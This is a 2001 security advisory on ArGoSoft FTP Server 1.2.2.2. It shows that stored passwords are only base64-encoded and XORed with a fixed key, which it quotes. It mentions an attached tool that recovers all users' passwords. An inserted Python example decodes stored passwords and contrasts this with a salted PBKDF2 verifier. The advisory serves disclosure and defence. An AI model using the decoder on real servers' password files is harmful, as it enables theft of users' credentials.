ArGoSoft FTP Server 1.2.2.2 Weak password encryption


Date: Thu, 12 Jul 2001 11:36:53 -0700 (PDT)
From: ByteRage <[email protected]>
To: [email protected]
Subject: ArGoSoft FTP Server 1.2.2.2 Weak password encryption


ArGoSoft FTP Server 1.2.2.2 Weak password encryption

AFFECTED SYSTEMS

ArGoSoft FTP Server 1.2.2.2

DESCRIPTION

ArGoSoft FTP Server 1.2.2.2 for win32 is vulnerable to
decryption of the password file. As a matter of fact
the programmers are aware of this since they have
implemented decryption algorithms within the FTP
Server program itself, as we can find the decrypted
passwords when watching the program's memory dumps, or
using system debuggers or special tools to peek at the
password (User Properties) which is hidden with ****
(normally one would expect this to contain something
like "-=encrypted=-" so that it can only be changed,
but in this case it contains the plaintext password)

This simple observation brings up the fact that the
password file uses a weak password encryption
algorithm, and that the passwords can be obtained from
the ciphertext data.

So I started studying this program and found
the following decryption algorithm:

We have the password in ciphertext : NkouCREIJVU=
1) we lookup the individual ciphertext characters in
   the table 'A'-'Z', 'a'-'z', '0'-'9', '+', '/'
   and take the indices ranging from 0 -> 63
   (these represent 6 bits)
   4 of these characters make up 3 binary bytes
   (4*6 bits = 3*8 bits)
2) we XOR the resulting binary limb with :
  
"T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk="
(we XOR the first byte of our decoded stuff with "T",
the second with "3", etc...)

If we finish these two passes we get : NkouCREIJVU= ->
byterage
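
The two passes described above, as an added example that is not part of the original post or its agscrack.c attachment, placed beside a one-way salted verifier to show what a non-reversible password store looks like. The function names and the PBKDF2 parameters are assumptions made for this example, and inputs longer than the fixed string are rejected because the advisory does not say how they are handled.

```python
import base64
import hashlib
import hmac
import os

# Fixed XOR string quoted in the advisory; its ASCII characters are the key bytes.
KEY = b"T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk="


def _xor_with_key(data: bytes) -> bytes:
    # The advisory does not say what happens past the end of the key,
    # so longer inputs are rejected here rather than guessed at.
    if len(data) > len(KEY):
        raise ValueError("input longer than the fixed key")
    return bytes(b ^ k for b, k in zip(data, KEY))


def argosoft_decode(stored: str) -> str:
    """Pass 1: base64 table lookup. Pass 2: XOR with the fixed string."""
    raw = base64.b64decode(stored, validate=True)
    return _xor_with_key(raw).decode("latin-1")


def argosoft_encode(password: str) -> str:
    """Inverse of the two passes; XOR is its own inverse, so no secret is needed."""
    return base64.b64encode(_xor_with_key(password.encode("latin-1"))).decode("ascii")


def make_verifier(password: str, iterations: int = 600_000) -> tuple:
    """One-way alternative (assumed parameters): random salt + PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest


def check_password(candidate: str, verifier: tuple) -> bool:
    """Recompute the digest for a login attempt and compare in constant time."""
    salt, iterations, digest = verifier
    trial = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, iterations)
    return hmac.compare_digest(trial, digest)


if __name__ == "__main__":
    print(argosoft_decode("NkouCREIJVU="))       # test vector from the advisory
    record = make_verifier("byterage")
    print(check_password("byterage", record))  # stored record holds no password
```
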

I've attached source code that decrypts ciphertext
passwords : you can give them as the first parameter
to the executable, or you can also give it the
filename of an ArGoSoft FTP password file, so that it
gives you the passwords of all users.

IMPACT

When combining this with that *.lnk upload bug I
pointed out earlier, any user with write access can
not only traverse directories but also obtain the
passwords of all users.

VENDOR STATUS

I have sent my findings to [email protected] but
since they use the decryption algorithms within the
FTP Server program themselves, they are aware of the
fact that the password encryption is reversible.
Hopefully they will review the encryption algorithm in
a next release.


[ByteRage] [email protected] [www.byterage.cjb.net]
